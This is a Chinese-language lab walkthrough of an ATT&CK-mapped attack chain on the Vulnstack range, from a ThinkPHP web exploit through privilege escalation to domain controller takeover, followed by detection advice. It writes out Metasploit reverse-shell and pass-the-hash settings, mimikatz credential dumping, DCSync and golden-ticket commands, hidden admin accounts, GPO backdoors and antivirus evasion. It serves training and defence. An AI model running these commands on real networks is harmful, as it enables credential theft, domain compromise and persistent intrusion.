基于ATTCK框架的内网渗透实战:从Vulnstack靶场到域控攻陷 1. 项目概述从靶场到实战的桥梁如果你是一名安全从业者或者对攻防对抗感兴趣那么“内网渗透”这个词对你来说一定不陌生。它不再是电影里黑客敲几下键盘就能接管整个公司网络的魔幻场景而是一套严谨、系统、步步为营的技术与战术组合。今天要聊的就是如何通过一个名为Vulnstack的靶场环境来深度复现和剖析一套基于ATTCK框架的内网渗透攻击路径。这不仅仅是一个“打靶”练习更是一次完整的红队思维训练。Vulnstack靶场模拟了一个相对真实的企业内网环境里面有域控、有Web服务器、有各种常见的脆弱配置而ATTCK框架则为我们提供了攻击者可能采取的技术行为矩阵。将两者结合我们就能像真正的攻击者一样思考拿到一个边缘Web服务器的权限后接下来该往哪里走如何横向移动如何定位域控并最终夺取整个域的控制权这个过程就是红队实战的精髓所在。很多人练习渗透容易陷入“点”的困境比如执着于某个漏洞的利用却不知道利用成功后该做什么。或者知道一些内网渗透的命令但命令背后的原理和在不同场景下的变通却一无所知。本次基于Vulnstack的实战剖析目的就是解决这些问题。我们会从一个初始的Web漏洞入手一步步深入内网详细拆解每一个环节信息收集、权限提升、横向移动、凭证窃取、权限维持直到最终的域控攻陷。我会分享在每一步中攻击者红队的思考逻辑、可用的技术选项对应ATTCK中的技术ID、具体操作命令以及更重要的是——防守方蓝队应该如何基于这些技术行为去发现和响应。无论你是想提升实战能力的红队人员还是希望理解攻击链以更好进行防御的蓝队或安全运维人员这篇深度剖析都能为你提供一条清晰的、可复现的进阶路径。2. 环境搭建与攻击起点分析2.1 Vulnstack靶场拓扑与核心弱点解读Vulnstack靶场通常被设计为一个模拟的小型域环境。以经典的Vulnstack 1为例其典型拓扑包含三台虚拟机Win7 (IP: 192.168.52.143)扮演边缘Web服务器通常运行着存在漏洞的应用程序如PHPStudy、某CMS拥有双网卡一块连接外部模拟互联网NAT一块连接内部域网络仅主机模式。Win2k3 (IP: 192.168.52.138)扮演域内成员服务器可能提供文件共享、数据库等服务是横向移动的关键跳板。Win2k8 (IP: 192.168.52.141)扮演域控制器Domain Controller, DC是整个域的核心存储所有域账户信息控制域内身份验证。攻击者的起点就是那台对外提供服务的Win7。其核心弱点往往是一个常见的Web漏洞例如PHPStudy的后门、ThinkPHP的命令执行漏洞、或者是Struts2的远程代码执行漏洞。这里以ThinkPHP 5.0.* 的远程代码执行漏洞对应ATTCK技术T1190 - Exploit Public-Facing Application为例。这个漏洞的利用非常简单通过一个特定的URL参数就能在服务器上执行系统命令。但我们的目的不是简单地执行一个whoami就结束而是要获取一个稳定的、交互式的控制通道。注意在真实红队评估中获取初始立足点的漏洞利用需要极其谨慎避免对业务系统造成不可逆的破坏。靶场环境则允许我们进行更深入的探索。利用漏洞执行命令我们通常首先尝试反弹一个Shell。在Windows环境下最经典的方式是使用powershell下载并执行Payload。例如我们可以让目标服务器从我们的攻击机下载一个PowerShell版的Meterpreter脚本并执行。这里就涉及到ATTCK的另一个技术T1105 - Ingress Tool Transfer工具传输。攻击者需要将必要的工具如后门、扫描器传入目标内网。在实战中可能会使用各种隐蔽方式如DNS隧道、HTTPS流量、或者伪装成正常软件的安装包。2.2 获取初始立足点与基础信息收集成功通过Web漏洞执行powershell命令反弹回一个Meterpreter会话后我们就正式进入了内网。此时我们拥有的只是一个普通用户权限的Shell可能是IIS或Apache的运行账户。第一步不是急着横移而是进行细致的信息收集T1018 - Remote System Discovery,T1082 - System Information Discovery。在Meterpreter会话中我们需要执行以下关键命令来绘制初步的“战场地图”ipconfig /all查看当前主机的网络配置确认是否存在多块网卡以及内网网段的IP地址、DNS服务器通常指向域控信息。这是发现内网存在的第一个关键证据。systeminfo查看系统详细信息包括操作系统版本、补丁情况。这有助于我们寻找本地提权Local Privilege Escalation的突破口。例如如果系统未安装某个关键的漏洞补丁如MS17-010我们就有了一个强大的提权武器。net user和net localgroup administrators查看当前主机上的本地用户和管理员组。有时开发或运维人员为了图方便会将域用户加入本地管理员组这将成为我们获取域凭证的捷径。net view /domain和net view尝试查看当前域和域内的工作组/机器列表。如果当前用户是域用户这些命令能直接列出域内的其他主机为横向移动提供目标。这个阶段的信息收集是后续所有行动的基础。它决定了我们提权的方向、横向移动的目标选择以及攻击路径的规划。一个专业的红队队员会像侦探一样不放过任何一点看似无关的信息。3. 权限提升与内网侦察深化3.1 本地提权路径的选择与实战在Vulnstack的Win7上我们初始获得的权限往往是www-data或iis apppool\defaultapppool这类低权限账户。要深入内网特别是要进行有效的横向移动和凭证窃取通常需要更高的权限最好是SYSTEM或本地Administrator权限。这就是本地提权T1068 - Exploitation for Privilege Escalation。提权方法有很多需要根据之前systeminfo收集到的信息来针对性选择利用未打补丁的系统漏洞这是最直接的方式。例如使用windows-exploit-suggester.py这类脚本将目标的systeminfo结果与微软漏洞库比对快速找出可能的提权EXP。在较老的Windows 7系统上像MS16-032、MS14-058等都是常见选项。在Meterpreter中我们可以直接使用getsystem命令它背后会自动尝试多种已知的提权技术如令牌窃取、命名管道模拟等有时能一键成功。利用错误的服务配置T1035 - Service Execution检查是否有服务以SYSTEM权限运行但其二进制文件路径的权限配置不当允许普通用户修改或替换。我们可以用accesschk.exeSysInternals工具需上传或PowerShell脚本来扫描。利用AlwaysInstallElevated策略如果组策略中启用了AlwaysInstallElevated那么任何用户都可以以SYSTEM权限安装MSI包。我们可以制作一个恶意的MSI包来获取权限。利用计划任务T1053 - Scheduled Task查看是否有计划任务以高权限运行并且其执行的动作或脚本我们可以控制。在Vulnstack环境中为了教学目的通常会预留一个经典的提权漏洞。例如Win7没有打MS17-010永恒之蓝补丁。我们可以直接从攻击机使用msfconsole的exploit/windows/smb/ms17_010_eternalblue模块将目标IP设置为Win7的内网IP如192.168.52.143即可获得一个SYSTEM权限的会话。这一步成功后我们从一个低权限的Web Shell转变为了拥有目标主机最高权限的控制者。3.2 内网主机发现与端口扫描拿到SYSTEM权限后我们的视野和能力都得到了扩展。接下来要进行更主动的内网侦察T1046 - Network Service Scanning。我们需要找出内网里还有哪些“活”着的主机它们都开放了哪些端口和服务。由于我们处在内网中可以直接进行ARP扫描或ICMP扫描来发现存活主机。在Meterpreter的SYSTEM会话中我们可以切换到shell然后使用上传的nmap进行扫描。但更隐蔽的方式是使用MSF内置的模块或PowerShell脚本。使用MSF的ARP扫描模块use auxiliary/scanner/discovery/arp_sweep设置RHOSTS为内网网段如192.168.52.0/24。使用ping命令遍历写一个简单的for /l循环脚本进行ICMP探测。发现存活主机例如确认了192.168.52.138和192.168.52.141后需要对它们进行端口扫描。这里要特别注意隐蔽性避免触发防火墙或IDS的警报。慢速扫描、随机化扫描顺序、使用常见的业务端口如80, 443, 445, 3389进行针对性扫描都是可选的策略。nmap -sS -sV -Pn -T4 192.168.52.138,141这条命令进行了SYN扫描-sS、服务版本探测-sV、不进行主机发现-Pn假设主机存活、速度级别4-T4。扫描结果可能会显示Win2k3 (138): 开放了445端口SMB文件共享、3389端口RDP远程桌面、可能还有80端口IIS。Win2k8 (141): 开放了53端口DNS、88端口Kerberos、389端口LDAP、445端口、3389端口等。这些端口强烈暗示了它域控制器的身份。至此我们绘制出了一张清晰的内网资产地图一台Win7已控一台Win2k3成员服务器一台Win2k8域控制器。攻击路径的下一个目标自然而然地指向了那台成员服务器因为从经验看域成员服务器上往往存储着更多有价值的资料也可能存在配置问题能让我们更接近域控。4. 横向移动技术与凭证窃取4.1 利用SMB与PTH攻击突破边界横向移动T1210 - Exploitation of Remote Services是内网渗透的核心。我们已控Win7目标是Win2k3。如何过去最经典的突破口是445端口的SMB服务。首先我们需要一组有效的凭证。此时我们在Win7的SYSTEM权限下可以施展一个杀手锏抓取内存中的密码哈希T1003 - OS Credential Dumping。使用Meterpreter的hashdump命令可以抓取本地SAM数据库中的哈希。但更有价值的是使用mimikatz需上传。在Meterpreter中我们可以load kiwikiwi是mimikatz的MSF版然后执行creds_all或者更精细的命令lsa_dump_sam lsa_dump_secrets这个操作可能会dump出本地管理员密码的NTLM哈希甚至可能抓到登录过的域用户密码或哈希假设我们抓取到了本地管理员Administrator的NTLM哈希aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4。现在我们有了哈希但Win2k3的SMB服务不一定允许我们直接用这个哈希连接。这里就引入了Pass The Hash (PTH)攻击T1550.002 - Use Alternate Authentication Material: Pass the Hash。这种攻击允许我们无需知道明文密码仅凭密码哈希就能进行身份验证。我们可以使用MSF的psexec模块但将认证方式设置为SMBPass哈希use exploit/windows/smb/psexec set RHOSTS 192.168.52.138 set SMBUser Administrator set SMBPass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST [你的攻击机IP] set LPORT 4445 exploit如果攻击成功我们就会获得一个Win2k3服务器上的SYSTEM权限会话。这一步的成功依赖于目标服务器Win2k3的Administrator账户使用了与我们抓取的哈希相同的密码在域环境中如果所有机器本地管理员密码相同或者该哈希就是域用户的哈希则可能性很大并且防火墙允许445端口的连接。4.2 票据攻击与Kerberos协议滥用如果PTH攻击不成功或者我们想探索更“域”特色的攻击方式那么就需要关注Kerberos协议。在域环境中用户登录后会获得各种票据Ticket。其中最珍贵的是黄金票据Golden Ticket和白银票据Silver Ticket对应ATTCK技术T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket。要制作黄金票据我们需要一个关键信息krbtgt账户的NTLM哈希。这个账户是域控上专门用于签发票据的账户它的哈希是域Kerberos认证体系的根密钥。一旦获得就可以伪造任意域内用户的TGT票据授予票据从而访问域内任何服务。获取krbtgt哈希需要域控的SYSTEM权限。我们目前还没有所以黄金票据是后续目标。而在当前阶段我们可以在已控的Win7或Win2k3上尝试抓取当前登录用户的TGTTicket-Granting Ticket或TGSTicket-Granting Service。使用mimikatz的sekurlsa::tickets /export命令可以导出内存中的Kerberos票据。如果导出的票据恰好有访问Win2k3上某个服务如CIFS文件共享的权限我们就可以使用Pass The Ticket (PTT)攻击T1550.003 - Use Alternate Authentication Material: Pass the Ticket将该票据注入到当前会话然后无需密码即可访问那台服务器。具体操作是用mimikatz导出.kirbi格式的票据文件然后在攻击机上用mimikatz的kerberos::ptt命令将票据注入到当前内存。之后使用dir \\192.168.52.138\c$这样的命令如果票据有效就能直接列出目标服务器的C盘目录。这种攻击方式比PTH更隐蔽因为它使用的是正常的Kerberos流程很难被传统的基于哈希比对的安全产品发现。5. 域控攻陷与权限维持5.1 定位域控与获取域管哈希通过横向移动我们可能已经控制了多台域成员服务器。最终目标——域控制器DC——的IP我们在信息收集阶段就已经通过DNS服务器地址或端口扫描结果推测出来了192.168.52.141。现在需要的是能登录域控的凭证。在已控的域成员服务器如Win2k3上我们拥有本地SYSTEM权限。可以再次运行mimikatz来抓取凭证。这次重点不再是本地SAM而是LSASS本地安全机构子系统服务进程的内存空间因为其中可能缓存了登录过的域账户凭证。执行sekurlsa::logonpasswords这个命令会倾泻LSASS进程中所有可读的登录信息包括明文密码如果系统策略未禁用WDigest缓存、NTLM哈希、Kerberos票据等。我们的目标是找到域管理员Domain Admin组成员的账户哈希。例如我们可能发现一个用户vulnstack\Administrator的NTLM哈希。这个账户默认就是域管理员。实操心得在较新版本的Windows如Win10/Win2k16之后上默认情况下无法通过sekurlsa::logonpasswords抓取到明文密码但NTLM哈希通常仍然可以抓到。此外执行此操作需要极高的权限通常是SYSTEM并且会触发大多数EDR终端检测与响应产品的警报因为它是对LSASS进程的直接内存读取。在真实红队行动中会有更多绕过和隐蔽的技巧。一旦获取了域管理员的哈希攻击域控就变得非常简单。我们可以直接对域控的IP192.168.52.141再次发起PTH攻击使用psexec、wmiexecT1047 - Windows Management Instrumentation或smbexec等工具。例如使用Impacket工具包中的wmiexec.pypython3 wmiexec.py vulnstack/Administrator192.168.52.141 -hashes aad3b435b51404eeaad3b435b51404ee:[域管NTLM哈希]成功执行后我们就获得了域控制器上的一个交互式Shell权限是域管理员。至此从技术上讲我们已经“攻陷”了整个域可以任意添加/删除域用户、修改组策略、访问域内任何资源。5.2 制作黄金票据与持久化后门攻陷域控后红队的工作并未结束。我们还需要巩固战果建立持久化的访问通道T1136 - Create Account,T1098 - Account Manipulation以便即使最初的漏洞被修复我们仍然能自由进出。首先就是在域控上直接获取krbtgt账户的哈希。在域控的SYSTEM权限Shell中运行mimikatzlsadump::dcsync /domain:vulnstack.com /user:krbtgtdcsync是mimikatz模拟域控之间同步数据的一个功能可以远程需要域管权限或本地在域控上直接拉取指定用户的哈希。执行后我们会得到krbtgt的NTLM哈希和其AES-256密钥。有了krbtgt的哈希我们就可以在任何地方、任何时候伪造黄金票据了。即使域内所有用户的密码都被更改只要krbtgt的密码其哈希的源没有被重置通常很少发生我们伪造的黄金票据就一直有效。制作黄金票据的命令如下kerberos::golden /domain:vulnstack.com /sid:[域SID] /rc4:[krbtgt的NTLM哈希] /user:任意用户名如fakeadmin /ptt执行/ptt后这张伪造的票据就被注入到当前会话的内存中。之后我们就可以用fakeadmin这个不存在的用户身份访问域内任何服务。这是权限维持的“核武器”。其次更常规的持久化手段包括创建隐藏的后门域账户使用net user命令添加一个名字看似普通的用户如sqlbackup$并将其加入Domain Admins组。美元符号$可以使其在net user命令的默认查看中隐藏。SSPSecurity Support Provider注入将mimikatz的mimilib.dll注册为SSP这样所有用户登录时的凭证都会被记录到文件。这是一种被动的凭证窃取后门。计划任务在域控或关键服务器上创建计划任务定期从外网服务器下载并执行Payload以维持反向连接。组策略对象GPO后门修改或创建GPO将其链接到整个域或特定OU在GPO的启动/关机脚本中植入后门命令。这样所有受该GPO影响的计算机在启动或关机时都会执行我们的命令实现批量、自动化的权限维持。在Vulnstack靶场中实践这些持久化技术能让你深刻理解攻击者是如何在目标网络中“扎根”的。对于蓝队而言监控异常账户的创建、GPO的更改、计划任务以及LSASS进程的异常访问都是发现此类持久化行为的关键。6. 防御视角下的ATTCK映射与检测建议整个攻击路径走完我们不仅完成了攻击更重要的是从ATTCK框架的视角清晰地看到了每一环对应的技术。现在让我们切换到蓝队视角看看如何防御。初始访问TA0001防御T1190漏洞利用的关键在于及时为面向公网的应用打补丁并部署WAF等防护设备。对异常的网络请求如包含命令执行特征的URL参数进行告警。执行TA0002T1105工具传输的检测可以通过网络流量分析工具监控主机是否从非常见的外部地址下载可执行文件或脚本文件。主机EDR可以检测可疑的进程创建行为特别是由Web服务进程如w3wp.exe,php-cgi.exe发起的cmd.exe或powershell.exe。权限提升TA0003对T1068漏洞利用提权的检测需要主机安全产品具备漏洞利用尝试的检测能力或者监控敏感进程如lsass.exe的句柄请求。系统应保持最新的安全补丁。防御规避TA0005攻击者使用的mimikatz等工具是重点防御对象。应启用Credential GuardWindows等 Credential Theft Mitigation 功能保护LSASS进程。监控对LSASS进程的远程线程注入或直接内存读取操作。凭证访问TA0006T1003凭证转储是检测的重中之重。任何对SAM、SECURITY等注册表Hive文件的访问或者对LSASS进程的ReadProcessMemory操作都应产生高优先级告警。强制使用强密码并定期更换可以降低PTH攻击的成功率。发现TA0007对T1018远程系统发现、T1046网络扫描的检测可以通过网络IDS监控内网中异常的横向扫描流量如短时间内对大量IP的445端口发起连接。主机层面监控net view、net group等命令的执行。横向移动TA0008T1210远程服务利用的典型代表就是PTH。检测PTH攻击传统基于密码的认证日志无法发现但可以监控异常的身份验证来源。例如一台Web服务器突然用域管理员账户去访问文件服务器的SMB服务这非常可疑。启用NTLM审计日志并集中分析认证事件有助于发现此类行为。对于PTT攻击监控Kerberos票据的申请和使用模式异常票据如过期时间极长、服务权限异常可以被检测出来。影响TA0040对于T1136创建账户、T1098账户操纵应严格审核域账户的创建和权限变更日志。任何将普通用户加入特权组如Domain Admins、Enterprise Admins的操作都应触发即时告警。通过将Vulnstack实战中的每一步操作映射到ATTCK蓝队可以构建一个基于行为的威胁检测模型。防守不再是简单地封堵某个IP或某个漏洞而是围绕攻击者的“战术、技术和过程TTPs”来部署层层检测和响应措施。这种“知己知彼”的对抗思维正是现代安全运营的核心。7. 常见问题与排查技巧实录在实际操作Vulnstack靶场或进行类似内网渗透练习时你肯定会遇到各种问题。下面是我在多次演练中总结的一些典型问题及解决方法这可能是比标准教程更有价值的部分。问题1利用Web漏洞执行命令成功但反弹Shell失败。现象在浏览器或利用工具中执行whoami、ipconfig等命令有回显但使用powershell反弹Meterpreter或其它Payload时会话无法建立。排查思路网络连通性首先确认攻击机是否监听正确端口防火墙是否放行。在靶机Web漏洞处执行ping [攻击机IP]看是否通。如果不通可能是靶机出网受限或者网络拓扑如仅主机模式配置有误。出网协议与端口限制企业内网通常限制出网流量。尝试使用不同端口如80、443、53进行反弹这些是常用业务端口可能未被封锁。在MSF中设置LPORT 80或443。Payload兼容性目标系统可能缺少.NET环境导致某些基于.NET的PowerShell Payload失败。尝试使用更原始的ncNetcat反向Shell命令或者使用msfvenom生成纯windows/shell_reverse_tcp的exe文件通过Web漏洞上传并执行。杀软拦截靶机可能安装了杀毒软件拦截了常见的恶意PowerShell脚本或Meterpreter内存注入。尝试对Payload进行编码、混淆或者使用Veil-Evasion、Shellter等工具生成免杀Payload。实操心得永远准备备用方案。我的习惯是在利用一个Web漏洞时同时准备三种Payload一个PowerShell反向Shell命令一个exe文件下载执行命令一个基于常规端口的和基于80/443端口的监听。一种不行立刻换另一种。问题2PTH攻击失败返回“STATUS_LOGON_FAILURE”错误。现象使用抓取到的哈希进行psexec或wmiexec攻击时提示登录失败。排查思路哈希有效性首先确认哈希是否正确。mimikatz抓取的哈希格式是LMHASH:NTLMHASH其中LMHASH部分在现代系统中通常是aad3b435b51404eeaad3b435b51404ee空值。确保你复制的是完整的NTLM哈希部分冒号后的32位字符串。目标用户身份确认你使用的用户名SMBUser在目标机器上是否存在且可用。你抓取的是Win7上本地Administrator的哈希但Win2k3上的本地管理员账户名可能不是Administrator或者该账户被禁用。尝试使用.\Administrator格式指定本地账户。目标系统配置目标服务器如Win2k3可能禁用了SMBv1而你的攻击工具默认使用SMBv1。在MSF的psexec模块中可以尝试设置SMB::ProtocolVersion为2或3。更简单的方法是换用wmiexec或atexec它们不依赖SMB协议。UAC限制即使你是本地管理员在较新系统上远程网络登录可能受UAC限制令牌是“过滤”的。可以尝试传递本地管理员组中其他用户的哈希或者使用Restricted Admin Mode仅限RDP等特性但这在横向移动中不常用。更可靠的方法是先获取一个Shell再在目标上提权。实操心得PTH不是万能的。优先尝试使用抓取到的明文密码如果mimikatz抓到了的话。如果PTH失败立即转向其他横向移动方法如利用MS17-010如果目标未打补丁、或者寻找Web应用漏洞进行二次突破。问题3使用mimikatz的sekurlsa::logonpasswords抓不到密码或哈希。现象命令执行后只显示一些零散信息没有看到明显的Username和NTLM或Password字段。排查思路权限不足确保你当前的会话是SYSTEM权限。在Meterpreter中务必先使用getsystem或利用提权漏洞升级到SYSTEM。系统版本在Windows 8.1 / Server 2012 R2及更高版本上默认禁用WDigest凭据缓存因此抓不到明文密码。但NTLM哈希通常仍可抓取。确保你使用的是最新版的mimikatz它支持从多个位置提取凭证。保护机制启用如果目标系统启用了Credential Guard基于虚拟化的安全那么LSASS进程会被隔离在一个安全容器中传统的mimikatz无法读取其内存。这种情况下需要更高级的绕过技术或者转向其他凭证获取方式如dumpsam、dump secrets或dcsync。命令语法在MSF的kiwi扩展中正确的命令是creds_all它会尝试所有方式抓取凭证。也可以单独尝试lsa_dump_sam和lsa_dump_secrets。实操心得不要只依赖sekurlsa::logonpasswords。多管齐下先用hashdump抓本地哈希再用kiwi或mimikatz的lsa_dump_sam和lsa_dump_secrets如果控制了域成员尝试用net use等命令访问共享看是否有缓存的凭据最后终极目标是拿到域控权限后做dcsync。问题4横向移动到域控时如何选择攻击点现象拿到了域管哈希但直接对域控的445、135等端口发起攻击失败。排查思路网络隔离域控可能处于更核心的网络区域与普通成员服务器之间有防火墙隔离限制了某些端口的访问。尝试扫描域控开放的所有端口寻找非常规入口如WinRM5985/5986、SQL Server端口1433等。协议与端口尝试不同的协议和工具。445端口SMB不行可以试135端口WMI的wmiexec或者5985端口WinRM的evil-winrm工具。命令示例evil-winrm -i 192.168.52.141 -u Administrator -H [域管NTLM哈希]。从内部跳板攻击如果有一台已控的、与域控网络互通性更好的服务器如同一网段的管理服务器可以在这台服务器上上传攻击工具然后从内部对域控发起攻击绕过边界防火墙限制。Kerberos票据攻击如果抓到了域管账户的TGT票据优先使用PTT。这通常比PTH更有效且更隐蔽。实操心得攻击域控是最后一步务必谨慎。在真实环境中对域控的异常登录尝试会触发最高级别的安全告警。在测试中可以先从低权限操作开始比如用域管凭证访问域控的共享目录\\DC\C$如果成功说明凭证有效再尝试执行命令。同时准备好清理痕迹的方案。